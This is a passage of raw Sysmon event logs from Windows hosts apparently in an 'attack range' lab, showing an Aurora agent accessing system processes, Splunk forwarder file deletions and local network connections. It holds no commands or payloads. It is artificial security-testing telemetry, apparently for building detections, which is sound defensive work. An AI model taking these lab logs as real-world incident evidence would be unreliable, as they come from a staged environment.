Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.739{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.734{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.718{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.716{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.199{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.197{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.117{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9EA79F40F07E709733FE92F5D877DE0,SHA256=CE20260070948CD6CDE368AC5FBB3EE25CB7662BEB4507B972CF53D148A7F893,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018069Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:35.207{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72BEC76BFD1BC82F2F191F3887862EDE,SHA256=79F71B609A2AC602C463FFBECB91A5186A83DE47A1C5EAAEA1437B330BF7F32B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018068Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:35.160{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5040288D3DBECF79C41E6B6B5988E1F4,SHA256=7FDA3485B7FDD7B0D34434175B277D3939E6A5450B08E4EF4E97768214142606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:35.971{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=0DE10AEF779FAE4779CA3F8EF393AA97,SHA256=749E387439670C92A947053FE30A0ACAA14A3A24EBF8A51FA1AC1656FB26D4C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:35.284{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25A809DD062276DA677773C0CEBB135C,SHA256=3887D8101AFCF056D86008101696B134D4A196978F4DA60A60F877AB5172B1BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:36.382{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1926240220CFC3D9E61C78460565C8E,SHA256=AE9BCD88E250DC0D1B265DAA8682DC8D3E83E666BE9576B1FBE4BBB0818E599D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:34.693{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56434-false10.0.1.12-8000- 23542300x800000000000000018070Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:36.257{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12415C7B98E58ED6B9F63F60C4E93C39,SHA256=B0543B2F007A0EC237CBA93A3B864B3950AC1550F706723A40BC00081FA429EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018072Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:37.332{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDBF7FECC8511124854E9F279BCFF507,SHA256=07900A432C6B67D5BBF9F8B4D41BD852A6C7E0F16194FDDFE8D4C4D6FFD1FE52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:37.464{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68FC84B953411F485E1842314BD9599B,SHA256=DC10304C49E92B37BDBB4AC2D8047DBA153EEE80C278DEC83C327EDEB7A52D04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018071Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:35.019{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50161-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018073Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:38.408{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7233364CFB81048E4ECA6417A93A12,SHA256=74EFE438D3FBBA3ABB23EEBD2703D545C647F51BF1783CBF79D5239B0C4E8E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:38.552{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A26A670D7A6435CDAE35B48A47DDA4,SHA256=4B3460F56120C72EA78105236DC35407B22CFF91F95C2AFF93081627A10C6353,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018074Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:39.490{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EC7ED4A2C5A7C28F99A7263331DC90E,SHA256=8EDD3234765A1735EAFA2F9C1835679A5558ABF784710CB6E579B8CC709CB3D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:39.641{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905C6C2C29838388F3A8259D21F849C8,SHA256=567D25E987D005F1D9F2FCA84927553460821565F8D4C84F9DF391644C786351,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018075Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:40.573{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B10FF4C27885F95089B5CB1CAB2ABD9,SHA256=6762D6E811890D4974CA9F417C417C8B4E202F667CDF3CB1D24A50A55247C3F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:40.739{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A6EC2B463E55754810D2D4C220982DD,SHA256=1CDDEBFDEAD39C83F2A70CA6996C554A9A2C381FBF993B3B3C2ACDEDABB2185B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:40.676{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 